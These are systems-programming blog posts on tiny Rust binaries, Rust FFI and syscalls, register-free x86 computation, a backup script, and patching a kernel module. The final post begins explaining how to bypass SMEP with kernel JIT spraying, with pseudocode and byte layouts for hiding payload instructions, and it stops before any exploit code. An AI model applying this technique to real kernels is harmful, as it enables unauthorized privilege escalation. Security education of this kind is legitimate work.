A Rust slice like &[u8] consists of a pointer to some memory, and a length indicating the number of elements that may be found there. The module std::raw exposes this as an ordinary struct that we build, then transmute to the actual slice type. The transmute function generates no code; it just tells the type checker to treat our raw::Slice<u8> as if it were a &[u8]. We return this value out of the unsafe block, taking advantage of the "everything is an expression" syntax, and then print the message as before.

Trying out the new version:

$ rustc tinyrust.rs \
    -O -C no-stack-check -C relocation-model=static \
    -L syscall.rs/target
$ ar x libtinyrust.rlib tinyrust.o
$ objdump -dr tinyrust.o
0000000000000000 <main>:        
   0:   b8 01 00 00 00          mov    $0x1,%eax
   5:   bf 01 00 00 00          mov    $0x1,%edi
   a:   be 08 00 40 00          mov    $0x400008,%esi
   f:   ba 07 00 00 00          mov    $0x7,%edx
  14:   0f 05                   syscall 
  16:   b8 3c 00 00 00          mov    $0x3c,%eax
  1b:   31 ff                   xor    %edi,%edi
  1d:   0f 05                   syscall 

...
$ wc -c < tinyrust
151
$ ./tinyrust
Hello!

The object code is the same as before, except that the relocation for the string constant has become an absolute address. The binary is smaller by 7 bytes (the size of "Hello!\n") and it still works!

You can find the full code on GitHub. The code in this article works on rustc 1.0.0-dev (44a287e6e 2015-01-08). If I update the code on GitHub, I will also update the version number printed by the included build script.

I'd be curious to hear if anyone can make my program smaller!

C is not really "bare metal", but that's another story. ↩
From a pure language perspective. If you want to talk about availability of compilers and libraries, then Rust still has a bit of a disadvantage ;) ↩
In fact, this code grew out of an earlier experiment with really small binaries in C. ↩

A taste of Rust (yum) for C/C++ programmers

2014-10-29T12:10:00.001-07:00

If, like me, you've been frustrated with the status quo in systems languages, this article will give you a taste of why Rust is so exciting. In a tiny amount of code, it shows a lot of ways that Rust really kicks ass compared to C and C++. It's not just safe and fast, it's a lot more convenient.

Web browsers do string interning to condense the strings that make up the Web, such as tag and attribute names, into small values that can be compared quickly. I recently added event logging support to Servo's string interner. This will allow us to record traces from real websites, which we can use to guide further optimizations.

Here are the events we can log:

#[deriving(Show)]
pub enum Event {
    Intern(u64),
    Insert(u64, String),
    Remove(u64),
}

Interned strings have a 64-bit ID, which is recorded in every event. The String we store for "insert" events is like C++'s std::string; it points to a buffer in the heap, and it owns that buffer.

This enum is a bit fancier than a C enum, but its representation in memory is no more complex than a C struct. There's a tag for the three alternatives, a 64-bit ID, and a few fields that make up the String. When we pass or return an Event by value, it's at worst a memcpy of a few dozen bytes. There's no implicit heap allocation, garbage collection, or anything like that. We didn't define a way to copy an event; this means the String buffer always has a unique owner who is responsible for freeing it.

The deriving(Show) attribute tells the compiler to auto-generate a text representation, so we can print an Event just as easily as a built-in type.

Next we declare a global vector of events, protected by a mutex:

lazy_static! {
    pub static ref LOG: Mutex<Vec<Event>>
        = Mutex::new(Vec::with_capacity(50_000));
}

lazy_static! will initialize both of them when LOG is first used. Like String, the Vec is a growable buffer. We won't turn on event logging in release builds, so it's fine to pre-allocate space for 50,000 events. (You can put underscores anywhere in a integer literal to improve readability.)

lazy_static!, Mutex, and Vec are all implemented in Rust using gnarly low-level code. But the amazing thing is that all three expose a safe interface. It's simply not possible to use the variable before it's initialized, or to read the value the Mutex protects without locking it, or to modify the vector while iterating over it.

The worst you can do is deadlock. And Rust considers that pretty bad, still, which is why it discourages global state. But it's clearly what we need here. Rust takes a pragmatic approach to safety. You can always write the unsafe keyword and then use the same pointer tricks you'd use in C. But you don't need to be quite so guarded when writing the other 95% of your code. I want a language that assumes I'm brilliant but distracted :)

Rust catches these mistakes at compile time, and produces the same code you'd see with equivalent constructs in C++. For a more in-depth comparison, see Ruud van Asseldonk's excellent series of articles about porting a spectral path tracer from C++ to Rust. The Rust code performs basically the same as Clang / GCC / MSVC on the same platform. Not surprising, because Rust uses LLVM and benefits from the same backend optimizations as Clang.

lazy_static! is not a built-in language feature; it's a macro provided by a third-party library. Since the library uses Cargo, I can include it in my project by adding

[dependencies.lazy_static]
git = "https://github.com/Kimundi/lazy-static.rs"

to Cargo.toml and then adding

#[phase(plugin)]
extern crate lazy_static;

to src/lib.rs. Cargo will automatically fetch and build all dependencies. Code reuse becomes no harder than in your favorite scripting language.

Finally, we define a function that pushes a new event onto the vector:

pub fn log(e: Event) {
    LOG.lock().push(e);
}

LOG.lock() produces an RAII handle that will automatically unlock the mutex when it falls out of scope. In C++ I always hesitate to use temporaries like this because if they're destroyed too soon, my program will segfault or worse. Rust has compile-time lifetime checking, so I can do things that would be reckless in C++.

If you scroll up you'll see a lot of prose and not a lot of code. That's because I got a huge amount of functionality for free. Here's the logging module again:

#[deriving(Show)]
pub enum Event {
    Intern(u64),
    Insert(u64, String),
    Remove(u64),
}

lazy_static! {
    pub static ref LOG: Mutex<Vec<Event>>
        = Mutex::new(Vec::with_capacity(50_000));
}

pub fn log(e: Event) {
    LOG.lock().push(e);
}

This goes in src/event.rs and we include it from src/lib.rs.

#[cfg(feature = "log-events")]
pub mod event;

The cfg attribute is how Rust does conditional compilation. Another project can specify

[dependencies.string_cache]
git = "https://github.com/servo/string-cache"
features = ["log-events"]

and add code to dump the log:

for e in string_cache::event::LOG.lock().iter() {
    println!("{}", e);
}

Any project which doesn't opt in to log-events will see zero impact from any of this.

If you'd like to learn Rust, the Guide is a good place to start. We're getting close to 1.0 and the important concepts have been stable for a while, but the details of syntax and libraries are still in flux. It's not too early to learn, but it might be too early to maintain a large library.

By the way, here are the events generated by interning the three strings foobarbaz foo blockquote:

Insert(0x7f1daa023090, foobarbaz)
Intern(0x7f1daa023090)
Intern(0x6f6f6631)
Intern(0xb00000002)

There are three different kinds of IDs, indicated by the least significant bits. The first is a pointer into a standard interning table, which is protected by a mutex. The other two are created without synchronization, which improves parallelism between parser threads.

In UTF-8, the string foo is smaller than a 64-bit pointer, so we store the characters directly. blockquote is too big for that, but it corresponds to a well-known HTML tag. 0xb is the index of blockquote in a static list of strings that are common on the Web. Static atoms can also be used in pattern matching, and LLVM's optimizations for C's switch statements will apply.

Raw system calls for Rust

2014-09-17T17:33:00.000-07:00

I wrote a small library for making raw system calls from Rust programs. It provides a macro that expands into in-line system call instructions, with no run-time dependencies at all. Here's an example:

#![feature(phase)]

#[phase(plugin, link)]
extern crate syscall;

fn write(fd: uint, buf: &[u8]) {
    unsafe {
        syscall!(WRITE, fd, buf.as_ptr(), buf.len());
    }
}

fn main() {
    write(1, "Hello, world!\n".as_bytes());
}

Right now it only supports x86-64 Linux, but I'd love to add other platforms. Pull requests are much appreciated. :)

Calling a Rust library from C (or anything else!)

2014-08-27T22:45:00.000-07:00

One reason I'm excited about Rust is that I can compile Rust code to a simple native-code library, without heavy runtime dependencies, and then call it from any language. Imagine writing performance-critical extensions for Python, Ruby, or Node in a safe, pleasant language that has static lifetime checking, pattern matching, a real macro system, and other goodies like that. For this reason, when I started html5ever some six months ago, I wanted it to be more than another "Foo for BarLang" project. I want it to be the HTML parser of choice, for a wide variety of applications in any language.

Today I started work in earnest on the C API for html5ever. In only a few hours I had a working demo. And this is a fairly complicated library, with 5,000+ lines of code incorporating

most of the hilariously complicated parsing rules in the HTML spec,
a Rust syntax extension for writing parse rules in a concise form that matches the spec,
compile-time perfect hash maps for string interning and named characters, and
lots and lots of generic code — if this library were written in C++, almost all of it would be in header files.

It's pretty cool that we can use all this machinery from C, or any language that can call C. I'll describe first how to build and use the library, and then I'll talk about the implementation of the C API.

html5ever (for C or for Rust) is not finished yet, but if you're feeling adventurous, you are welcome to try it out! And I'd love to have more contributors. Let me know on GitHub about any issues you run into.

Using html5ever from C

Like most Rust libraries, html5ever builds with Cargo.

$ git clone https://github.com/kmcallister/html5ever
$ cd html5ever
$ git checkout dev
$ cargo build
    Updating git repository `https://github.com/sfackler/rust-phf`
   Compiling phf_mac v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)
   Compiling html5ever-macros v0.0.0 (file:///tmp/html5ever)
   Compiling phf v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)
   Compiling html5ever v0.0.0 (file:///tmp/html5ever)

The C API isn't Cargo-ified yet, so we'll build it using the older Makefile-based system.

$ mkdir build
$ cd build
$ ../configure
$ make libhtml5ever_for_c.a
rustc -D warnings -C rpath -L /tmp/html5ever/target -L /tmp/html5ever/target/deps \
  -o libhtml5ever_for_c.a --cfg for_c --crate-type staticlib /tmp/html5ever/src/lib.rs
warning: link against the following native artifacts when linking against this static library
note: the order and any duplication can be significant on some platforms, and so may need to be preserved
note: library: rt
note: library: dl
note: library: pthread
note: library: gcc_s
note: library: pthread
note: library: c
note: library: m

Now we can build an example C program using that library, and following the link instructions produced by rustc.

$ H5E_PATH=/tmp/html5ever
$ gcc -Wall -o tokenize tokenize.c -I $H5E_PATH/capi -L $H5E_PATH/build \
  -lhtml5ever_for_c -lrt -ldl -lpthread -lgcc_s -lpthread -lc -lm

$ ./tokenize 'Hello&comma; <i class=excellent>world!</i>'
CHARS : Hello
CHARS : ,
CHARS :  
TAG   : <i>
  ATTR: class="excellent"
CHARS : world!
TAG   : </i>

The build process is pretty standard for C; we just link a .a file and its dependencies. The biggest obstacle right now is that you won't find the Rust compiler in your distro's package manager, because the language is still changing so rapidly. But there's a ton of effort going into stabilizing the language for a Rust 1.0 release this year. It won't be too long before rustc is a reasonable build dependency.

Let's look at the C client code.

#include <stdio.h>

#include "html5ever.h"

void put_str(const char *x) {
    fputs(x, stdout);
}

void put_buf(struct h5e_buf text) {
    fwrite(text.data, text.len, 1, stdout);
}

void do_start_tag(void *user, struct h5e_buf name, int self_closing, size_t num_attrs) {
    put_str("TAG   : <");
    put_buf(name);
    if (self_closing) {
        putchar('/');
    }
    put_str(">\n");
}

// ...

struct h5e_token_ops ops = {
    .do_chars = do_chars,
    .do_start_tag = do_start_tag,
    .do_tag_attr = do_tag_attr,
    .do_end_tag = do_end_tag,
};

struct h5e_token_sink sink = {
    .ops = &ops,
    .user = NULL,
};

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s 'HTML fragment'\n", argv[0]);
        return 1;
    }

    struct h5e_tokenizer *tok = h5e_tokenizer_new(&sink);
    h5e_tokenizer_feed(tok, h5e_buf_from_cstr(argv[1]));
    h5e_tokenizer_end(tok);
    h5e_tokenizer_free(tok);
    return 0;
}

The struct h5e_token_ops contains pointers to callbacks. Any events we don't care to handle are left as NULL function pointers. Inside main, we create a tokenizer and feed it a string. html5ever for C uses a simple pointer+length representation of buffers, which is this struct h5e_buf you see being passed by value.

This demo only does tokenization, not tree construction. html5ever can perform both phases of parsing, but the API surface for tree construction is much larger and I didn't get around to writing C bindings yet.

Implementing the C API

Some parts of Rust's libstd depend on runtime services, such as task-local data, that a C program may not have initialized. So the first step in building a C API was to eliminate all std:: imports. This isn't nearly as bad as it sounds, because large parts of libstd are just re-exports from other libraries like libcore that we can use with no trouble. To be fair, I did write html5ever with the goal of a C API in mind, and I avoided features like threading that would be difficult to integrate. So your library might give you more trouble, depending on which Rust features you use.

The next step was to add the #![no_std] crate attribute. This means we no longer import the standard prelude into every module. To compensate, I added use core::prelude::*; to most of my modules. This brings in the parts of the prelude that can be used without runtime system support. I also added many imports for ubiquitous types like String and Vec, which come from libcollections.

After that I had to get rid of the last references to libstd. The biggest obstacle here involved macros and deriving, which would produce references to names under std::. To work around this, I create a fake little mod std which re-exports the necessary parts of core and collections. This is similar to libstd's "curious inner-module".

I also had to remove all uses of format!(), println!(), etc., or move them inside #[cfg(not(for_c))]. I needed to copy in the vec!() macro which is only provided by libstd, even though the Vec type is provided by libcollections. And I had to omit debug log messages when building for C; I did this with conditionally-defined macros.

With all this preliminary work done, it was time to write the C bindings. Here's how the struct of function pointers looks on the Rust side:

#[repr(C)]
pub struct h5e_token_ops {
    do_start_tag: extern "C" fn(user: *mut c_void, name: h5e_buf,
        self_closing: c_int, num_attrs: size_t),
    
    do_tag_attr: extern "C" fn(user: *mut c_void, name: h5e_buf,
        value: h5e_buf),

    do_end_tag:  extern "C" fn(user: *mut c_void, name: h5e_buf),

    // ...
}

The processing of tokens is straightforward. We pattern-match and then call the appropriate function pointer, unless that pointer is NULL. (Edit: eddyb points out that storing NULL as an extern "C" fn is undefined behavior. Better to use Option<extern "C" fn ...>, which will optimize to the same one-word representation.)

To create a tokenizer, we heap-allocate the Rust data structure in a Box, and then transmute that to a raw C pointer. When the C client calls h5e_tokenizer_free, we transmute this pointer back to a box and drop it, which will invoke destructors and finally free the memory.

You'll note that the functions exported to C have several special annotations:

#[no_mangle]: skip name mangling, so we end up with a linker symbol named h5e_tokenizer_free instead of _ZN5for_c9tokenizer18h5e_tokenizer_free.
unsafe: don't let Rust code call these functions unless it promises to be careful.
extern "C": make sure the exported function has a C-compatible ABI. The data structures similarly get a #[repr(C)] attribute.

Then I wrote a C header file matching this ABI:

struct h5e_buf {
    unsigned char *data;
    size_t len;
};

struct h5e_buf h5e_buf_from_cstr(const char *str);

struct h5e_token_ops {
    void (*do_start_tag)(void *user, struct h5e_buf name,
        int self_closing, size_t num_attrs);

    void (*do_tag_attr)(void *user, struct h5e_buf name,
        struct h5e_buf value);

    void (*do_end_tag)(void *user, struct h5e_buf name);

    /// ...
};

struct h5e_tokenizer;

struct h5e_tokenizer *h5e_tokenizer_new(struct h5e_token_sink *sink);
void h5e_tokenizer_free(struct h5e_tokenizer *tok);
void h5e_tokenizer_feed(struct h5e_tokenizer *tok, struct h5e_buf buf);
void h5e_tokenizer_end(struct h5e_tokenizer *tok);

One remaining issue is that Rust is hard-wired to use jemalloc, so linking html5ever will bring that in alongside the system's libc malloc. Having two separate malloc heaps will likely increase memory consumption, and it prevents us from doing fun things like allocating Boxes in Rust that can be used and freed in C. Before Rust can really be a great choice for writing C libraries, we need a better solution for integrating the allocators.

If you'd like to talk about calling Rust from C, you can find me as kmc in #rust and #rust-internals on irc.mozilla.org. And if you run into any issues with html5ever, do let me know, preferably by opening an issue on GitHub. Happy hacking!

x86 is Turing-complete with no registers

2014-02-11T21:50:00.000-08:00

In which x86 has too many registers after all.

Introduction

The fiendish complexity of the x86 instruction set means that even bizarrely restricted subsets are capable of arbitrary computation. As others have shown, we can compute using alphanumeric machine code or English sentences, using only the mov instruction, or using the MMU as it handles a never-ending double-fault. Here is my contribution to this genre of Turing tarpit: x86 is Turing-complete with no registers.

No registers?

What do I mean by "no registers"? Well, really just whatever makes the puzzle interesting, but the basic guideline is:

No instruction's observable behavior can depend on the contents of any ordinary user-space register.

So we can't read from R[ABCD]X, R[SD]I, R[SB]P (that's right, no stack), R8-R15, any of their smaller sub-registers, or any of the x87 / MMX / SSE registers. This forbids implicit register access like push or movsb as well as explicit operands. I think I would allow RIP-relative addressing, but it's probably not useful when you're building a single executable which loads at a fixed address.

We also can't use the condition flags in EFLAGS, so conditional jumps and moves are right out. Many instructions will set these flags, but those dead stores are okay by me.

All memory access depends on segment selectors, the page table base in CR3, and so on. We trust that the OS (Linux in my example) has set up a reasonable flat memory model, and we shouldn't try to modify that. Likewise there are debug registers, parts of EFLAGS (such as the trap bit), and numerous MSRs which can influence the execution of nearly any instruction. We ignore all that too. Basically, the parts of CPU state which normal user-space code doesn't touch are treated as constants.

So what's left that we can work with? Just

the instruction pointer,
memory operands, and
self-modifying code.

But it would be too easy to self-modify an instruction into having a register operand. The above restrictions must hold for every instruction we execute, not just those appearing in our binary. Later on I'll demonstrate experimentally that we aren't cheating.

The instruction set

In a RISC architecture, every memory access is a register load or store, and our task would be completely impossible. But x86 does not have this property. For example we can store a constant directly into memory. Here's machine code along with NASM (Intel syntax) assembly:

c6042500004000ba          mov byte  [0x400000], 0xba
66c7042500004000dbba      mov word  [0x400000], 0xbadb
c7042500004000efbead0b    mov dword [0x400000], 0xbadbeef
48c7042500004000efbead0b  mov qword [0x400000], 0xbadbeef

In the latter case the 4-byte constant is sign-extended to 8 bytes.

We can also perform arithmetic on a memory location in place:

8304250000400010          add dword [0x400000], 0x10

But moving data around is going to be hard. As far as I know, every instruction which loads from one address and stores to another, for example movsb, depends on registers in some way.

Conditional control flow is possible thanks to this gem of an instruction:

ff242500004000            jmp qword [0x400000]

This jumps to whatever address is stored as a 64-bit quantity at address 0x400000. This seems weird but it's really just a load where the destination register is the instruction pointer. Many RISC architectures also allow this.

Compiling from Brainfuck

Let's get more concrete and talk about compiling Brainfuck code to this subset of x86. Brainfuck isn't the simplest language out there (try Subleq) but it's pretty familiar as an imperative, structured-control language. So I think compiling from Brainfuck makes this feel "more real" than compiling from something super weird.

A Brainfuck program executes on a linear tape of (typically) byte-size cells.

TAPE_SIZE equ 30000

tape_start:
    times TAPE_SIZE dq cell0

head equ tape_start + (TAPE_SIZE / 2)

Like many Brainfuck implementations, the tape has a fixed size (more on this later) and we start in the middle. head is not a variable with a memory location; it's just an assembler constant for the address of the middle of the tape.

Since our only way to read memory is jmp [addr], the tape must store pointers to code. We create 256 short routines, each representing one of the values a cell can hold.

cont_zero:     dq 0
cont_nonzero:  dq 0
out_byte:      db 0

align 16
cell_underflow:
    jmp inc_cell

align 16
cell0:
    mov byte [out_byte], 0
    jmp [cont_zero]

%assign cellval 1
%rep 255
    align 16
    mov byte [out_byte], cellval
    jmp [cont_nonzero]
    %assign cellval cellval+1
%endrep

align 16
cell_overflow:
    jmp dec_cell

There are two things we need to do with a cell: get its byte value for output, and test whether it's zero. So each routine moves a byte into out_byte and jumps to the address stored at either cont_zero or cont_nonzero.

We produce most of the routines using a NASM macro. We also have functions to handle underflow and overflow, so a cell which would reach -1 or 256 is bumped back to 0 or 255. (We could implement the more typical wrap-around behavior with somewhat more code.)

The routines are aligned on 16-byte boundaries so that we can implement Brainfuck's + and - by adding or subtracting 16. But how do we know where the head is? We can't store it in a simple memory variable because we'd need a double-indirect jump instruction. This is where the self-modifying code comes in.

test_cell:
    jmp [head]

inc_cell:
    add qword [head], 16
    jmp test_cell

dec_cell:
    sub qword [head], 16
    jmp test_cell

move_right:
    add dword [inc_cell+4],  8
    add dword [dec_cell+4],  8
    add dword [test_cell+3], 8
    jmp [cont_zero]

move_left:
    sub dword [inc_cell+4],  8
    sub dword [dec_cell+4],  8
    sub dword [test_cell+3], 8
    jmp [cont_zero]

Recall that head is an assembler constant for the middle of the tape. So inc_cell etc. will only touch the exact middle of the tape — except that we modify the instructions when we move left or right. The address operand starts at byte 3 or 4 of the instruction (check the disassembly!) and we change it by 8, the size of a function pointer.

Also note that inc_cell and dec_cell jump to test_cell in order to handle overflow / underflow. By contrast the move instructions don't test the current cell and just jump to [cont_zero] unconditionally.

To output a byte we perform the system call write(1, &out_byte, 1). There's no escaping the fact that the Linux system call ABI uses registers, so I allow them here. We can do arbitrary computation without output; it's just nice if we can see the results. Input is messier still but it's not fundamentally different from what we've seen here. Code that self-modifies by calling read() is clearly the future of computing.

Putting it all together, I wrote a small Brainfuck compiler which does little more than match brackets. For each Brainfuck instruction it outputs one line of assembly, a call to a NASM macro which will load cont_[non]zero and jump to one of test_cell, inc_cell, etc. For the program [+] the compiler's output looks like

k00000000: do_branch k00000003, k00000001
k00000001: do_inc    k00000002
k00000002: do_branch k00000003, k00000001
k00000003: jmp exit

which blows up into something like

401205:  48c70425611240005c124000  mov qword ptr [0x401261], 0x40125c
401211:  48c704256912400022124000  mov qword ptr [0x401269], 0x401222
40121d:  e90cefffff                jmp 40012e <test_cell>

401222:  48c70425611240003f124000  mov qword ptr [0x401261], 0x40123f
40122e:  48c70425691240003f124000  mov qword ptr [0x401269], 0x40123f
40123a:  e9f6eeffff                jmp 400135 <inc_cell>

40123f:  48c70425611240005c124000  mov qword ptr [0x401261], 0x40125c
40124b:  48c704256912400022124000  mov qword ptr [0x401269], 0x401222
401257:  e9d2eeffffe9d2eeffff      jmp 40012e <test_cell>

40125c:  e9c1eeffff                jmp 400122 <exit>

Even within our constraints, this code could be a lot more compact. For example, a test could be merged with a preceding inc or dec.

Demos

Let's try it out on some of Daniel B Cristofani's Brainfuck examples.

$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | ./rip
Hello, world!

$ curl -s http://www.hevanet.com/cristofd/brainfuck/fib.b | ./compiler
$ ./rip
0
1
1
2
3
5
8
13
…

And now let's try a Brainfuck interpreter written in Brainfuck. There are several, but we will choose the fastest one (by Clive Gifford), which is also compatible with our handling of end-of-file and cell overflow.

$ curl -s http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b | ./compiler
$ (curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b;
   echo '!Uryyb, jbeyq!') | ./rip
Hello, world!

This takes about 4.5 seconds on my machine.

Verifying it with `ptrace`

How can we verify that a program doesn't use registers? There's no CPU flag to disable registers, but setting them to zero after each instruction is close enough. Linux's ptrace system call allows us to manipulate the state of a target process.

uint64_t regs_boundary;

void clobber_regs(pid_t child) {
    struct user_regs_struct   regs_int;
    struct user_fpregs_struct regs_fp;

    CHECK(ptrace(PTRACE_GETREGS, child, 0, &regs_int));
    if (regs_int.rip < regs_boundary)
        return;

    CHECK(ptrace(PTRACE_GETFPREGS, child, 0, &regs_fp));

    // Clear everything before the instruction pointer,
    // plus the stack pointer and some bits of EFLAGS.
    memset(&regs_int, 0, offsetof(struct user_regs_struct, rip));
    regs_int.rsp = 0;
    regs_int.eflags &= EFLAGS_MASK;

    // Clear x87 and SSE registers.
    memset(regs_fp.st_space,  0, sizeof(regs_fp.st_space));
    memset(regs_fp.xmm_space, 0, sizeof(regs_fp.xmm_space));

    CHECK(ptrace(PTRACE_SETREGS,   child, 0, &regs_int));
    CHECK(ptrace(PTRACE_SETFPREGS, child, 0, &regs_fp));

    clobber_count++;
}

For the layout of struct user_regs_struct, see /usr/include/sys/user.h.

We allow registers in the first part of the program, which is responsible for system calls. regs_boundary is set by looking for the symbol FORBID_REGS in the binary.

We run the target using PTRACE_SINGLESTEP, which sets the trap flag so that the CPU will raise a debug exception after one instruction. Linux handles this exception, suspends the traced process, and wakes up the tracer, which was blocked on waitpid.

while (1) {
    // For this demo it's simpler if we don't deliver signals to
    // the child, so the last argument to ptrace() is zero.
    CHECK(ptrace(PTRACE_SINGLESTEP, child, 0, 0));
    CHECK(waitpid(child, &status, 0));

    if (WIFEXITED(status))
      finish(WEXITSTATUS(status));

    inst_count++;
    clobber_regs(child);
}

And the demo:

$ gcc -O2 -Wall -o regclobber regclobber.c
$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | time ./regclobber ./rip
Hello, world!

Executed 81366 instructions; clobbered registers 81189 times.
0.36user 1.81system 0:01.96elapsed 110%CPU (0avgtext+0avgdata 1392maxresident)k

At almost two seconds elapsed, this is hundreds of times slower than running ./rip directly. Most of the time is spent in the kernel, handling all those system calls and debug exceptions.

I wrote about ptrace before if you'd like to see more of the things it can do.

Notes on universality

Our tape has a fixed size of 30,000 cells, the same as Urban Müller's original Brainfuck compiler. A system with a finite amount of state can't really be Turing-complete. But x86 itself also has a limit on addressable memory. So does C, because sizeof(void *) is finite. These systems are Turing-complete when you add an external tape using I/O, but so is a finite-state machine!

So while x86 isn't really Turing-complete, with or without registers, I think the above construction "feels like" arbitrary computation enough to meet the informal definition of "Turing-complete" commonly used by programmers, for example in the mov is Turing-complete paper. If you know of a way to formalize this idea, do let me know (I'm more likely to notice tweets @miuaf than comments here).

A shell recipe for backups with logs and history

2012-12-30T20:36:00.000-08:00

I wrote a shell script for a cron job that grabs backups of some remote files. It has a few nice features:

Output from the backup commands is logged, with timestamps.
cron will send me email if one of the commands fails.
The history of each backup is saved in Git. Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.

Here's how it works.

#!/bin/bash -e

cd /home/keegan/backups
log="$(pwd)"/log

exec 3>&2 > >(ts >> "$log") 2>&1

You may have seen exec used to tail-call a command, but here we use it differently. When no command is given, exec applies file redirections to the current shell process.

We apply timestamps by redirecting output through ts (from moreutils), and append that to the log file. I would write exec | ts >> $log, except that pipe syntax is not supported with exec.

Instead we use process substitution. >(cmd) expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with >. (It might name a temporary file created by the shell, or a special file under /dev/fd/.)

We also redirect standard error to the same place with 2>&1. But first we open the original standard error as file descriptor 3, using 3>&2.

function handle_error {
    echo 'Error occurred while running backup' >&3
    tail "$log" >&3
    exit 1
}
trap handle_error ERR

Since we specified bash -e in the first line of the script, Bash will exit as soon as any command fails. We use trap to register a function that gets called if this happens. The function writes some of the log file to the script's original standard output. cron will capture that and send mail to the system administrator.

Now we come to the actual backup commands.

cd foo
git pull

cd ../bar
rsync -v otherhost:bar/baz .
git commit --allow-empty -a -m '[AUTO] backup'
git repack -da

foo is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to disable automatic garbage collection and keep infinite reflog.

bar is a local-only Git repo storing history of a file synced from another machine. Semantically, Git stores each version of a file as a separate blob object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports "packed" storage, where the objects in a repo are compressed together. By repacking the repo after every commit, we can save a ton of space.

Hex-editing Linux kernel modules to support new hardware

2012-12-17T23:18:00.000-08:00

This is an old trick but a fun one. The ThinkPad X1 Carbon has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the ASIX AX88772 chip, which Linux has supported since time immemorial. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.

This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. But this seemed like an annoying yak to shave when I just wanted to get the machine working.

The patch to support the Lenovo adapter just adds a new USB device ID to an existing driver:

 }, {
+       // Lenovo U2L100P 10/100
+       USB_DEVICE (0x17ef, 0x7203),
+       .driver_info = (unsigned long) &ax88772_info,
+}, {
        // ASIX AX88772B 10/100
        USB_DEVICE (0x0b95, 0x772b),
        .driver_info = (unsigned long) &ax88772_info,

As a quick-and-dirty solution, we can edit the compiled kernel module asix.ko, changing that existing device ID (0x0b95, 0x772b) to the Lenovo one (0x17ef, 0x7203). Since x86 CPUs are little-endian, this involves changing the bytes

95 0b 2b 77

ef 17 03 72

I wanted to do this within the Debian installer without rebooting. Busybox sed does not support hex escapes, but printf does:

sed $(printf 's/\x95\x0b\x2b\x77/\xef\x17\x03\x72/') \
    /lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \
    > /tmp/asix.ko

(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, sed does not recognize + (aka \x2b) as repetition unless preceded by a backslash.)

Then I loaded the patched module along with its dependencies. A simple way is

modprobe asix
rmmod asix
insmod /tmp/asix.ko

And that was enough for me to complete the install over Ethernet. Of course, once everything is set up, it would be better to compile a properly-patched kernel using make-kpkg. I haven't got around to it yet because wireless is working great. :)

Attacking hardened Linux systems with kernel JIT spraying

2012-11-17T21:51:00.000-08:00

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

